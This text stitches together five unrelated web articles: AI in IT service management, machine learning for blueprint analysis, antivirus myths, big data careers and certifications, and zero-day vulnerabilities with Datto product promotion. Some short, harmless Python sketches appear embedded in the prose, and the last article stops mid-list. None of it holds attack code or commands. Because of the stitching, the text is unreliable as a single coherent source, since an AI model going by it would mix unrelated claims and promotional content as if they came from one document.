1. It needs to be able to adapt its behaviour based on experience.
2. It can’t be totally dependent on instructions from people and thus, needs to be able to learn on its own.
3. It needs to be able to come up with unanticipated results.
By these requirements, the AI that we interact with on a daily basis, such as Amazon's Alexa and Apple's Siri, is defined as 'weak AI'. This means it was created from a number of algorithms built to accomplish specific tasks. 'Strong AI' and 'General AI', which could replicate or even exceed human intelligence, may be the final aim for scientists but have not yet been successfully developed. This type of AI is still confined to existence on the movie screen – for now.
But Weak (or Narrow) AI is still very powerful today. Not only is this AI impacting our homes, but much of the excitement surrounding its development stems from its potential to revolutionise the workplace. Another Gartner report also states that “employing AI offers enterprises the opportunity to give customers an improved experience at every point of interaction, but without human governance, the opportunity will be squandered.” So as AI is implemented into the corporate environment, it will need “human governance” in order to be successful. This responsibility will most likely fall into the hands of corporate IT Service Management (ITSM) teams.
AI’s role in the revolution of ITSM
In turn, AI has the potential to transform ITSM into a more user-friendly and efficient system. The adoption of AI should, in theory, allow members of IT to delegate their more mundane daily tasks to AI software, freeing up their time for more strategic activities. Rather than operating in the background, IT staff would be able to reposition themselves as key business enablers.
We are already seeing AI technology being used in chatbot software, helping to move the task of dealing with customer inquiries and issues away from IT staff. This utilises conversational user interfaces, natural language recognition and learning/pattern recognition.
These conversation-based pattern and intent-learning technologies open the door for AI to be able to converse, learn and interpret an individual’s feelings, thus allowing for a more complex understanding of human behaviour. A learning, conversational AI experience will be critical for AI technology to succeed, and will revolutionise ITSM in a number of different ways.
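A keyword-based intent matcher is the simplest possible sketch of the intent-learning idea described above; real conversational AI uses statistical NLP rather than keyword lists, and the intents and keywords here are assumptions.

```python
# Toy intent matcher for an ITSM chatbot: scores each intent by how many
# of its (hypothetical) keywords appear in the user's message.

INTENTS = {
    "incident":       {"broken", "error", "crash", "down", "not working"},
    "request":        {"need", "access", "install", "order"},
    "password_reset": {"password", "locked", "reset", "forgot"},
}

def classify(message):
    """Return the intent whose keywords best match the message, or 'unknown'."""
    text = message.lower()
    scores = {intent: sum(kw in text for kw in kws) for intent, kws in INTENTS.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else "unknown"
```

Even this toy version shows why routing matters: if "my laptop is broken" lands in the incident queue instead of the request queue, the ticket starts in the right workflow without human triage.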
An AI-automated front line
At the moment, automated ITSM processes only work if all information provided is accurate, and mistakes can easily occur if a customer accidentally provides incorrect information. This can be as simple as customer clicking on the wrong link or wrongly ticking a box on an online form, perhaps making a request when they actually need troubleshooting help.
Consequently, customer experience can be poor as requests and incidents are either delayed or lost. This risk and uncertainty in old-style self-service ‘portals’ still means that most companies are understandably reluctant to divert their human ITSM front line resources away from handling phone conversations.
Adding AI technology to conversational chatbots enables the development of automated ITSM solutions that have the capability to interpret, diagnose and even assist on incidents and requests accurately without human intervention. As the technology develops, we will see it improve and personalise the end-user experience.
Good ITSM operates many ‘back-end’ processes and activities that may not be visible to an end user, yet ensure that vital IT systems remain operational, efficient and also help to improve the business.
Many proactive, corrective or fulfilment activities across incident management, request management and into event management, release management and change management can be made more efficient when an AI-enabled ITSM solution is integrated with other systems on the network. For example, ITSM AI can detect and automatically open a request or create or update an incident without human intervention.
For example, if AI-enabled ITSM was connected to IoT devices it would be notified instantly if a smart device was malfunctioning, without the end-user having to report it. Imagine how efficient this would make IT – the business would be well aware of its important place as a business enabler.
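The event-to-incident flow described above can be sketched as a small rule: device telemetry comes in, and a ticket is opened automatically when a reading crosses a threshold. The device names, fields, and thresholds below are invented for illustration.

```python
# Sketch of automated incident creation from device events; all names
# and thresholds here are hypothetical.

tickets = []

def handle_event(event, max_temp_c=75):
    """Open an incident automatically if a smart device reports overheating."""
    if event.get("temp_c", 0) > max_temp_c:
        ticket = {
            "type": "incident",
            "device": event["device"],
            "summary": f"{event['device']} overheating at {event['temp_c']}C",
        }
        tickets.append(ticket)
        return ticket
    return None

handle_event({"device": "printer-2f", "temp_c": 82})
handle_event({"device": "printer-3a", "temp_c": 40})
```

In a real deployment the ticket would be created through the ITSM tool's API rather than an in-memory list, but the shape of the automation is the same: event in, incident out, no human in the loop.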
All knowing AI
Furthermore, applying ITSM principles and decision making to the large volume of data from multiple IT systems within an organisation, introduces the ability to see much larger patterns, resulting in incredibly high operational efficiency. This would enable ITSM tools to lead with real-time insights and predictions about how a problem could progress, and give recommendations on how to fix it.
An ITSM solution powered by AI can even go one step further. If knowledge databases did not have answers to end user queries, technology would have the ability to search for answers on trusted websites.
It would also be able to solve problems based on data gathered from more than one single organisation, and would be able to learn new knowledge from offering solutions to users’ questions and needs.
Ultimately, although AI will improve over the next few years or even decades, humans remain vital for delivering good IT services. But an AI-enhanced ITSM system is not far out of reach – AI is evolving at a rapid pace and has the potential to work alongside humans to create a more efficient working environment. The introduction of AI technology into ITSM principles and toolsets will allow IT staff to become business enablers and productivity transformers, while the technology does the heavy lifting.
Sourced by Ian Aitchison, senior product director, ITSM at Ivanti | <urn:uuid:de9d38c1-c982-4a40-961c-af40309af2a5> | CC-MAIN-2024-38 | https://www.information-age.com/rise-artificial-intelligence-9832/ | 2024-09-16T16:37:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00687.warc.gz | en | 0.957766 | 1,311 | 2.90625 | 3 |
Blueprint analysis is a cornerstone in architecture and engineering and bridges conceptual ideas and concrete realities. The blueprints are guides to technical details, spatial relationships, and material specifications crucial for construction. An accurate analysis of these drawings ensures that the final structure is in alignment with the architect’s desires and compliant with regulatory standards while maintaining structural integrity. This process of examination and interpretation lays the foundation for successful architectural endeavors.
In an era of rapid technological advancements, the integration of machine learning into various industries has sparked transformations like never before. In architecture, technology has revolutionized the field of blueprint analysis, which was traditionally a time-consuming and labor-intensive process, by significantly enhancing the efficiency and accuracy of the process.
Basics of Machine Learning in Analysis
Machine learning (ML), a subset of artificial intelligence (AI), has emerged as a game-changer in blueprint analysis. ML focuses on developing algorithms and models capable of learning and making predictions based on data, enabling them to recognize patterns, identify anomalies, and make predictions. The iterative learning process helps models to continuously refine and improve as they are exposed to more data, allowing them to enhance their performance and accuracy over time. In blueprint analysis, machine learning models can be trained on vast datasets of diverse blueprints to develop a keen understanding of design principles, regulations, and common errors.
Challenges in Traditional Blueprint Analysis
The field of blueprint analysis involves a complex understanding of intricate design documents. Traditionally, this crucial task was undertaken by human experts who meticulously examined the blueprints for errors, inconsistencies, and compliance with regulations. This was often a labor-intensive and time-consuming process, leading to delays and increased project costs. While effective, the approach was prone to human error, consumed significant resources, and limited the speed of project development.
The Role of Cutting-Edge Machine Learning
Cutting-edge machine learning in blueprint analysis significantly reduces the time required for analysis. Algorithms can swiftly process vast amounts of data, automating repetitive tasks and accelerating the overall analysis process. ML models trained on diverse datasets can easily spot discrepancies, such as structural weaknesses, code violations, or design inconsistencies. This increases the accuracy of blueprint analysis, reducing the risk of errors. The iterative learning process of ML contributes to a dynamic and ever-improving blueprint analysis system.
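Before ML even enters the picture, many "code violation" checks reduce to rules over features extracted from a drawing; an ML pipeline would learn such rules from labeled drawings instead of hard-coding them. The element data and width limits below are invented for illustration.

```python
# Rule-based check over extracted blueprint elements; the minimum widths
# and element records are hypothetical, not real building-code values.

MIN_WIDTH_MM = {"door": 800, "corridor": 1200}

elements = [
    {"id": "D-101", "kind": "door",     "width_mm": 750},
    {"id": "D-102", "kind": "door",     "width_mm": 900},
    {"id": "C-001", "kind": "corridor", "width_mm": 1500},
]

def find_violations(elements):
    """Return ids of elements narrower than their kind's minimum width."""
    return [
        e["id"]
        for e in elements
        if e["width_mm"] < MIN_WIDTH_MM.get(e["kind"], 0)
    ]

violations = find_violations(elements)
```

The hard part that ML addresses is upstream of this check: reliably extracting the elements and their dimensions from a raster or vector drawing in the first place.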
Benefits of Revolutionizing Blueprint Analysis
Revolutionizing blueprint analysis with cutting-edge machine learning can have significant transformative gains including efficiency and accuracy, and expediting project development. Automating routine tasks can help professionals direct their efforts toward more complex aspects of their work. ML’s pattern-recognizing abilities open means to improved precision in blueprint analysis and provide valuable insights for project stakeholders.
As technologies evolve, the fusion of human expertise and cutting-edge ML capabilities promises to redefine design, construction, and the analysis of complex structures. The journey toward a future where Machine Learning is integral to blueprint analysis promises a more streamlined, error-free, and innovative approach to project development in the architectural and engineering landscape.
iTech has developed machine learning algorithms for architectural and engineering drawings. Please reach out if you have any questions about how machine learning can help your projects. | <urn:uuid:3ae8f1ae-170d-4b18-ad09-11949fbf8353> | CC-MAIN-2024-38 | https://itechdata.ai/revolutionizing-blueprint-analysis-with-cutting-edge-machine-learning/ | 2024-09-19T03:48:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00487.warc.gz | en | 0.930908 | 645 | 2.90625 | 3 |
Antivirus software – it’s your digital armor, but how much do you really know about it?
From casual internet users to tech enthusiasts, many of us harbor misconceptions about these essential security tools. You might believe free antivirus is just as effective as paid versions or that Macs don’t need protection at all. Perhaps you’ve avoided installing antivirus software for fear that it will grind your computer to a halt.
It's time to separate fact from fiction. In this post, we're tackling seven widespread myths about antivirus software head-on. We'll provide you with the hard facts and evidence-backed truths to help you make informed decisions about your digital security.
Whether you’re looking to strengthen your online defenses or simply curious about the real capabilities of antivirus software, you’re in the right place. Let’s cut through the misinformation and get to the heart of what antivirus can (and can’t) do for you.
Ready to test your antivirus knowledge and boost your cybersecurity savvy? Let’s dive in and debunk these myths one by one.
Myth 1: Antivirus software significantly slows down your device
Truth: While it’s true that antivirus software utilizes system resources, modern solutions are engineered to have a minimal impact on your device’s performance. Gone are the days when running a virus scan meant your computer would grind to a halt.
Quality antivirus programs now employ advanced optimization techniques to conduct regular scans without compromising your device’s efficiency. These improvements mean you can work, browse, or play while your antivirus keeps you protected in the background.
To ensure optimal performance:
- Install a single, high-quality antivirus program that meets your device’s system requirements. Multiple antivirus programs can conflict and actually decrease performance.
- Schedule scans during off-peak hours, such as overnight, to avoid interference with your work or leisure activities.
- Opt for antivirus solutions that offer a ‘gaming mode’ or ‘silent mode’ if you’re a gamer or frequently use resource-intensive applications.
Myth 2: Antivirus software only protects against a few viruses
Truth: Modern antivirus software provides comprehensive protection against many malicious programs, not just a handful of viruses. These solutions employ sophisticated detection methods to guard against known threats and identify new, emerging dangers.
Antivirus software typically uses two primary methods of detection:
- Signature-based detection: This method identifies known threats based on a continuously updated database of malware signatures. It’s like having a vast library of “mugshots” for digital criminals.
- Behavior-based detection: Using advanced techniques like machine learning, data science, and artificial intelligence, this method analyzes program behavior to identify new and evolving threats. It can spot malware that hasn’t been seen before based on how it acts.
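Signature-based detection, at its core, is a lookup of a file's fingerprint against a database of known-bad hashes. The sketch below uses SHA-256 over in-memory byte strings, and the "malware" sample is just a harmless test string.

```python
import hashlib

# Toy signature-based scan: hash each "file" and compare against a
# database of known-bad SHA-256 digests (the samples are harmless strings).

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

KNOWN_BAD = {sha256(b"pretend-malware-payload")}

def scan(files: dict) -> list:
    """Return names of files whose digest matches a known signature."""
    return [name for name, data in files.items() if sha256(data) in KNOWN_BAD]

flagged = scan({
    "invoice.pdf": b"pretend-malware-payload",
    "notes.txt":   b"meeting at 10am",
})
```

This also shows the method's limit: change one byte of the payload and the hash no longer matches, which is why behavior-based detection is needed alongside signatures.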
Myth 3: Apple products can’t get viruses
Truth: While Apple products were historically less targeted by cybercriminals, they are far from immune to malware. As Apple’s market share grows, so does its attractiveness as a target for malicious actors.
In fact, one of the first viruses ever released in the wild, Elk Cloner, was written for Apple II systems back in 1982. Fast forward to today, and we’re seeing an increasing number of sophisticated malware designed specifically for macOS and iOS.
Some notable examples include:
- XcodeGhost: A malware that infected iOS apps through a compromised version of Apple’s Xcode development tool.
- Silver Sparrow: A mysterious malware capable of running natively on M1 Macs.
- ThiefQuest: A hybrid malware that combines ransomware and data exfiltration capabilities.
The takeaway? Whether you’re a Mac or PC user, robust antivirus protection is essential.
Myth 4: You are 100% protected if you have antivirus software
Truth: While antivirus software is a crucial component of your digital security arsenal, it’s not an impenetrable shield against all cyber threats. Think of it as a vital piece of armor, but not the entire suit.
To truly fortify your digital defenses:
- Practice safe browsing habits: Avoid clicking on suspicious links or downloading attachments from unknown sources.
- Steer clear of downloading suspicious content: If it seems too good to be true, it probably is.
- Use a password manager: Create strong, unique passwords for each of your accounts.
- Keep your software and operating system updated: These updates often include critical security patches.
- Enable two-factor authentication where possible: This adds an extra layer of security to your accounts.
Remember, cybersecurity is a holistic practice. Antivirus software is your trusty sidekick, but you’re the superhero in charge of your digital safety.
Myth 5: Antivirus is only necessary for less-experienced users
Truth: Even the most tech-savvy among us can fall victim to malware. Cybercriminals are constantly evolving their tactics, and no one is immune to threats like zero-day vulnerabilities or compromised legitimate websites.
Consider these scenarios:
- A seasoned developer unknowingly downloads a compromised development tool, introducing malware into their system.
- An IT professional falls for a sophisticated phishing email that appears to be from their company’s CEO.
- A cybersecurity expert visits a legitimate website that has been temporarily hijacked to serve malware.
Antivirus software provides an essential layer of protection for all users, regardless of their technical expertise. It’s like wearing a seatbelt – even the most experienced drivers use them because accidents can happen to anyone.
Myth 6: Manual scans are necessary to run antivirus software
Truth: While manual scans were once a crucial part of maintaining your digital hygiene, modern antivirus software has made them largely obsolete for day-to-day use.
Today’s antivirus solutions perform automatic background scans, diligently checking files during downloads and when launching applications. This real-time protection means your system is continuously monitored for threats without you having to lift a finger.
Manual scans are now typically only required in specific situations:
- If you suspect your system might be infected
- After recovering from a malware infection
- When you connect an external drive that hasn’t been scanned recently
Think of it like your immune system – it’s always working in the background, and you only need to take extra measures when you suspect something’s wrong.
Myth 7: Antivirus companies create malware to sell their products
Truth: This conspiracy theory, while persistent, has no credible evidence to support it. Reputable antivirus companies are dedicated to protecting users from genuine threats created by cybercriminals.
Creating malware to drive sales would be not only unethical but also illegal and potentially devastating for a company’s reputation if discovered. The cybersecurity industry operates on trust, and any breach of that trust would likely result in irreparable damage to a company’s business.
Moreover, there’s simply no need for antivirus companies to create threats. Cybercriminals are unfortunately all too real and prolific, providing more than enough work for security researchers and antivirus developers.
Tips for choosing and using antivirus effectively
- Select a reputable solution: Choose an antivirus from a well-known, trusted company with a track record of reliability and regular updates. Check out our article listing the best antivirus providers for some quality options.
- Ensure compatibility: Verify the software is compatible with your operating system and meets your device specifications.
- Keep it updated: Regularly update your antivirus software to protect against the latest threats. Enable automatic updates if available.
- Enable real-time scanning: This provides continuous protection as you use your device.
- Schedule regular full system scans: Set these to run during off-peak hours to minimize disruption.
- Be wary of scare tactics: Treat pop-ups or emails claiming your computer is infected with suspicion – these may be scams themselves.
- Layer your defenses: Use antivirus in conjunction with other security measures like firewalls, ad-blockers, and regular software updates.
- Educate yourself: Stay informed about the latest cybersecurity threats and best practices. Knowledge is power in the fight against cybercrime.
Common Antivirus FAQs
Do I need antivirus software if I have a firewall?
Yes, you should use both. Firewalls and antivirus software serve different purposes and work together to protect your system. A firewall acts as a barrier, controlling incoming and outgoing network traffic, while antivirus software detects and removes malware that may have already entered your system. Using both provides a more comprehensive security solution.
Can antivirus software protect against ransomware?
Many modern antivirus solutions include specific anti-ransomware features. These typically work by monitoring for suspicious file encryption activities and blocking unknown programs from accessing certain directories. However, it’s important to note that no solution is 100% effective against all ransomware. Regular backups are crucial for protecting your data against ransomware attacks.
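A common building block for the encryption-monitoring behavior described above is an entropy check: encrypted data looks statistically random, so a file whose contents suddenly jump to near-maximum entropy is suspicious. The sketch below is illustrative only; the threshold and the idea of flagging single buffers are assumptions for the example, not how any particular product works.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    """Heuristic: a near-random byte distribution suggests ciphertext."""
    return shannon_entropy(data) >= threshold

print(looks_encrypted(b"hello hello hello hello"))  # False: plain text is low-entropy
print(looks_encrypted(bytes(range(256)) * 16))      # True: uniform bytes score 8.0
```

Real anti-ransomware features combine signals like this with rates of file modification and access to protected folders, since compressed files are also high-entropy.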
See also: Antivirus FAQ
Big data in business. What does it look like?
Despite the fact that only 26% of companies say they have achieved a data-driven culture, the big data industry continues to grow, with around 2,000,000,000,000,000,000 (two quintillion) bytes of data generated each day across all industries, and some estimates placing its value at $77 billion by 2023.
But who is using big data in the business arena, and what type of work is involved? That’s what we’ll be looking at in this article.
Big Data Concepts
Big data consists of extremely large volumes of structured, semi-structured, and unstructured information generated by a diverse array of sources, including business transactions, internet activity, machine data, sensor input, text, videos, and images.
At a conceptual level, big data is typically distinguished by three major characteristics, known as the three Vs:
- Volume – the huge amounts of data involved.
- Variety – which reflects the diversity of sources, types, and formats of the information.
- Velocity – which refers both to the speed at which big data is generated and the speed with which organizations have to process it in order to keep pace.
For businesses, computational analysis of very large data sets can reveal patterns, trends, and associations — especially in connection with human behavior and interactions — that fuel greater operational efficiency, enhance customer engagement, reduce costs, predict future outcomes, and enable new opportunities.
Big Data In Business
Analysis of information and the derivation of insights from it can create opportunities for organizations in any industry. Big data applications apply across a range of disciplines, including health care, finance, manufacturing, retail, software development, government, education, and infrastructure provision.
Big data analytics and data management are at work in the business arena in numerous areas, including:
- Analyzing customer and transaction data to reveal shopping habits and consumer behavior trends.
- Targeted advertising and the personalization of customer experiences.
- Fuel and route optimization for the transport industry.
- Predictive inventory ordering and supply chain optimization.
- Monitoring health conditions through data from wearables and remote diagnostics.
- Personalized health plans for cancer patients.
- Fraud and risk management in the financial services sector.
- Demand and preference-based media streaming.
- Real-time data monitoring and cyber security.
Big Data Business Professionals
Solution and service providers in the big data industry (and those private organizations fortunate enough to recruit or nurture them in-house) employ a range of specialist talent for the management, analysis, and deployment of big data projects. Let’s look at two of them in some depth.
The Big Data Engineer
A big data engineer takes responsibility for designing, developing, constructing, installing, testing and maintaining complete big data management and processing systems.
These responsibilities begin with data ingestion — taking data from various sources and ingesting it into a data lake, a centralized repository for various data sources with different formats and structures. The engineer may use different data ingestion approaches, such as batch and real-time extraction.
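As a toy illustration of the batch-ingestion step described above, the sketch below copies raw source files into a date-partitioned landing area, a common layout for file-based data lakes. The paths, dataset name, and partitioning scheme are invented for the example.

```python
import shutil
from datetime import date
from pathlib import Path

def batch_ingest(source_files, lake_root: Path, dataset: str) -> list[Path]:
    """Copy raw files as-is into a date-partitioned data-lake directory."""
    partition = lake_root / dataset / f"ingest_date={date.today().isoformat()}"
    partition.mkdir(parents=True, exist_ok=True)
    landed = []
    for src in map(Path, source_files):
        dest = partition / src.name
        shutil.copy2(src, dest)  # keep source timestamps for lineage
        landed.append(dest)
    return landed
```

A real pipeline would add schema checks, idempotency, and a streaming path for the real-time case, but the shape is the same: land raw data first, transform later.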
Since data in a raw format cannot be used directly, it has to be converted from one format to another or from one structure to another, depending on the use-case. For data transformation, the big data engineer must have a working knowledge of the various tools and custom scripts required for dealing with data of different complexity, structure, format, and volume.
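A minimal example of the format conversion described above: turning CSV rows into JSON Lines, one record per line. Real transformation jobs run at far larger scale with frameworks rather than custom scripts, but the shape of the task is the same.

```python
import csv
import io
import json

def csv_to_json_lines(csv_text: str) -> str:
    """Convert CSV (one format) into JSON Lines (another structure)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return "\n".join(json.dumps(row) for row in reader)

print(csv_to_json_lines("id,city\n1,Austin\n2,Oslo\n"))
# {"id": "1", "city": "Austin"}
# {"id": "2", "city": "Oslo"}
```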
Performance optimization is a top priority for the data engineer in business. The engineer must ensure that the complete process, from query execution to visualizing the data, is streamlined and optimized through reporting and interactive dashboards. This may typically involve automating processes, optimizing data delivery, and, if necessary, redesigning the complete architecture to improve performance. To accomplish this, big data engineers must be capable of handling, transforming, and managing big data using industry-standard tools, big data frameworks, and NoSQL databases.
The Big Data Analyst
Big Data analytics is the examination of extremely varied or large data sets to find relevant and useful information that can enable businesses to make informed choices. In the business realm, a big data analyst is responsible for analyzing these data sets to uncover hidden trends and patterns that will allow the organization to make more informed business decisions and gain a competitive advantage. So the data analyst’s remit includes identifying, collecting, analyzing, visualizing, and communicating this data to help business leaders navigate these future decisions.
The big data analyst must be versatile, as the job frequently involves switching roles from conducting research, to mining data for information, to presenting their findings. The ability to think critically and logically while also using creative reasoning and problem-solving skills are requisites for the job.
Data mining and auditing skills are essential. A big data analyst should also possess programming knowledge, quantitative and data interpretation skills, strong oral and written communication skills, and experience with multiple technologies and industry use cases.
Big Data Business Training
As highlighted by the two big data professional examples that we’ve seen, a diversity of deep skills is required for those working in the field, and while big data business training programs may begin at the formal academic level, the fully rounded professional also requires soft skills and some experience and knowledge of the industry.
With the salaries of Big Data Developers, Administrators, Analysts, and Architects among the highest in the industry and a shortage of talent affecting all sectors, big data certified professionals are in high demand. There are a number of big data certification schemes available, including:
Associate Certified Analytics Professional
The Associate Certified Analytics Professional (aCAP) credential is an entry-level analytics certification that demonstrates education in the analytics process, even though the individual may not have practical experience yet.
Cloudera Certified Associate (CCA) Data Analyst
Cloudera certifications help candidates design and develop data pipelines that will test their data ingestion, storage, and analysis skills. A SQL developer who earns the CCA Data Analyst certification demonstrates core analyst skills to load, transform, and model Hadoop data to define relationships and extract meaningful results from the raw output.
Certification of Professional Achievement in Data Sciences
The Certification of Professional Achievement in Data Sciences is a non-degree program intended to develop facility with foundational data science skills. It consists of four courses: Algorithms for Data Science, Probability & Statistics, Machine Learning for Data Science, and Exploratory Data Analysis and Visualization.
Big Data In Business – By Association
Finally, one application of big data in business that manages to cash in on the hype surrounding the phenomenon without delving actively into the technology is the Big Data band. They are a contemporary electro-pop project from Brooklyn-based producer and Harvard graduate Alan Wilkis, which explores humans vs. technology themes.
Vocalist Daniel Armbruster, Rajeev Basu (“interactive/hacker”), and GHOST+COW (“visual”) contributed early input to the project, which is best known for its single “Dangerous,” featuring Joywave, which reached number one on the Billboard Alternative Songs chart in August 2014. That same year, the song was featured in the films “Veronica Mars” and “Earth to Echo.”
Hackers in today’s advanced threat landscape are increasingly focusing on leveraging zero-day vulnerabilities to infiltrate systems and cause significant damage. These vulnerabilities are especially concerning for organizations because they represent unknown and unpatched weaknesses in software that attackers can exploit before anyone is aware of their existence. This unpredictability makes zero-day vulnerabilities a severe threat that requires immediate attention.
In this blog, we’ll define zero-day vulnerabilities, show a few examples of how they are exploited in business today and provide best practices for your company to defend against them. Additionally, we’ll highlight how solutions like Datto AV and Datto EDR are purpose-built to help prevent zero-day attacks from becoming a problem.
What is a zero-day vulnerability?
A zero-day vulnerability is a software flaw that is unknown to the vendor and thus has no available fix at the time it is discovered. These vulnerabilities have earned their moniker because the vendor has “zero days” to fix the flaw before malicious actors can exploit it. They differ from other cybersecurity threats due to their novelty and element of surprise, making them particularly dangerous.
Zero-day vulnerabilities often lead to zero-day exploits and zero-day attacks, which are explained below:
Zero-day vulnerability: A flaw in software that is unknown to the vendor. This lack of awareness means the vendor cannot create a patch or update to fix the flaw, leaving systems exposed to potential exploitation.
Zero-day exploit: The method used by attackers to take advantage of a zero-day vulnerability. This can include various techniques, such as injecting malicious code, gaining unauthorized access or manipulating system functions, to achieve their goals.
Zero-day attack: An attack that uses a zero-day exploit to compromise a system. These attacks are particularly dangerous because they occur before the vendor has a chance to address the vulnerability, often leading to significant damage.
Why are zero-day attacks dangerous and what is their impact?
Zero-day attacks are a growing concern in the cybersecurity landscape for several reasons. They are notoriously difficult to defend against due to their unknown nature and the critical time window between discovery and patch release. Here’s why zero-day attacks are particularly dangerous:
- Unknown vulnerabilities: Zero-day vulnerabilities are unknown to both the software vendor and users, making them extremely hard to detect and defend against. Because there is no awareness of the vulnerability, traditional defenses, such as antivirus programs and firewalls, are often ineffective.
- Exploitation window: There is a critical period between when the vulnerability is discovered by attackers and when a patch is released. During this window, systems are highly vulnerable. Attackers can exploit the vulnerability with impunity, knowing that defenses are not yet prepared to address the threat.
- Challenges in detection and mitigation: Zero-day attacks often lack signatures and use advanced evasion techniques, making them difficult to detect. These attacks can bypass traditional security measures by masking their activities or mimicking legitimate operations, making timely detection a significant challenge. The reactive nature of patching also poses significant challenges, as organizations must scramble to update their systems once a patch is available.
The impact of zero-day attacks can be severe, leading to:
- Data breaches: Zero-day exploits can lead to significant data breaches, compromising sensitive information. Attackers can steal personal data, financial information, intellectual property and other valuable assets, leading to severe consequences for individuals and organizations.
- Financial losses: The financial impact can be substantial, including costs related to data recovery, legal fees and regulatory fines. Businesses may also face expenses related to incident response, system repairs and compensation for affected customers.
- Reputation damage: The long-term damage to an organization’s reputation and customer trust can be profound. Customers may lose confidence in the organization’s ability to protect their data, leading to a loss of business and a tarnished brand image.
- Operational disruption: Zero-day attacks can disrupt business operations, leading to downtime and productivity losses. Systems may be rendered inoperable, critical services may be interrupted and business processes may be halted, resulting in significant operational challenges.
How zero-day vulnerabilities lead to zero-day attacks
Zero-day vulnerabilities are discovered by attackers before the vendors, making them hard to defend against. The lifecycle of a zero-day threat is as follows:
- Discovery: Attackers discover a vulnerability before the vendor is aware of it. This discovery can occur through various means, such as reverse engineering software, identifying flaws during penetration testing or uncovering weaknesses through routine scanning.
- Exploitation: Attackers create and deploy exploits to take advantage of the vulnerability. This can involve developing custom malware, leveraging existing exploit kits or utilizing social engineering techniques to deliver the exploit to the target system.
- Detection: Security researchers or vendors identify the exploit. This may occur through monitoring network traffic, analyzing suspicious activities or investigating reports from affected users. Once detected, efforts are made to understand the exploit and its impact.
- Mitigation: The vendor develops and releases a patch to fix the vulnerability. This process involves identifying the root cause of the vulnerability, developing a solution and distributing the patch to affected systems. Users must then apply the patch to protect their systems.
Attackers use this process to compromise systems and data, often causing significant damage before the vulnerability can be patched.
Who are targets for zero-day attacks?
Zero-day attacks can target a wide range of organizations and individuals. Common targets include:
- Large enterprises and corporations: These organizations often hold vast amounts of sensitive data, making them attractive targets. They may possess financial records, intellectual property, customer data and other valuable assets that attackers seek to exploit.
- Government agencies: Government systems can contain critical information and infrastructure, making them high-value targets. Attacks on government agencies can disrupt national security, public services and diplomatic activities.
- Financial institutions: Banks and other financial institutions are prime targets due to the financial data they hold. Successful attacks can lead to theft of funds, fraud and significant financial losses for both the institution and its customers.
- Healthcare organizations: Medical records are valuable, and healthcare systems are often targeted for their sensitive patient data. Attacks on healthcare organizations can disrupt patient care, compromise patient privacy and lead to regulatory fines.
- Educational institutions: Schools and universities can be targeted for both research data and personal information. Attacks can disrupt academic activities, compromise student and staff data and affect research projects.
- Noteworthy individuals: High-profile individuals, including executives and celebrities, can be targets for personal data and credentials. Attacks can lead to identity theft, financial fraud and reputational damage.
Examples of zero-day attacks
Here are a few notable examples of zero-day attacks:
Chrome zero-day vulnerability (CVE-2024-0519)
In January 2024, Google confirmed that CVE-2024-0519, an out-of-bounds memory access flaw in Chrome’s V8 JavaScript engine, was being actively exploited in the wild. Upon discovering the issue, Google promptly responded by releasing a security update designed to patch the vulnerability, and users were advised to update their Chrome browsers immediately.
MOVEit Transfer zero-day attack (CVE-2023-34362)
In May 2023, a zero-day vulnerability was exploited in MOVEit Transfer, a managed file transfer software. The vulnerability allowed attackers to bypass authentication and achieve remote code execution (RCE). Exploits of the vulnerability led to data breaches, financial losses and operational disruptions for the affected organizations.
In response, security teams promptly investigated the incident, reported the vulnerability and implemented mitigation measures. The vendor then released patches to address the vulnerability, but the incident underscored the critical importance of maintaining proactive security practices.
How to identify zero-day vulnerabilities
Detecting zero-day vulnerabilities is crucial for protecting systems and data. Key detection methods include:
- Behavioral analysis: Monitoring for unusual behavior that may indicate an exploit. This involves analyzing patterns of activity that deviate from normal operations, such as unexpected network traffic or unauthorized access attempts.
- Heuristic analysis: Using algorithms to identify patterns that suggest a zero-day attack. Heuristic analysis involves examining code and system behavior to identify characteristics of known exploits or suspicious activities.
- Signature-based detection: Comparing known attack signatures to detect anomalies. This method relies on a database of known malware signatures and can identify previously detected threats but may struggle with novel exploits.
- Machine learning (ML) and AI: Leveraging AI to detect previously unknown threats through pattern recognition. Machine learning models can analyze vast amounts of data to identify subtle indicators of compromise and adapt to new threats over time.
- Threat intelligence: Gathering and analyzing information about potential threats from various sources. Threat intelligence involves collecting data from cybersecurity communities, industry reports and other sources to stay informed about emerging threats and vulnerabilities.
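Of the methods above, signature-based detection is the simplest to illustrate: compute a cryptographic hash of a file and compare it against a database of known-bad hashes. The "signature database" below is fabricated for the example, and it also shows the method's limitation the text notes: a zero-day exploit has no signature yet.

```python
import hashlib

# Toy signature database: SHA-256 digests of previously identified malware.
KNOWN_BAD = {
    hashlib.sha256(b"malicious payload v1").hexdigest(),
}

def matches_signature(file_bytes: bytes) -> bool:
    """Signature-based check: exact hash match against known threats.
    A true zero-day has no entry here, which is why behavioral,
    heuristic, and ML methods are needed alongside it."""
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD

print(matches_signature(b"malicious payload v1"))  # True: known sample
print(matches_signature(b"novel zero-day code"))   # False: unseen, slips through
```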
How to prevent zero-day attacks
Preventive measures are essential for protecting against zero-day attacks. Listed below are some effective strategies.
Regular software updates and patch management
Ensuring all software is up to date with the latest security patches. Regularly updating software helps close known vulnerabilities and reduce the risk of exploitation.
Network segmentation
Dividing the network into segments to limit the spread of an attack. By isolating critical systems, organizations can contain potential breaches and prevent attackers from accessing the entire network.
Application allowlisting
Allowing only approved applications to run on the network reduces the attack surface by preventing unauthorized or malicious software from executing.
Intrusion detection and prevention systems (IDS/IPS)
Detecting and preventing malicious activity. IDS/IPS solutions monitor network traffic for suspicious behavior and can automatically block or mitigate potential threats.
Endpoint protection solutions
Using tools like Datto AV and Datto EDR to protect endpoints. These solutions provide comprehensive security for devices, including antivirus, firewall and threat detection capabilities.
Antivirus software
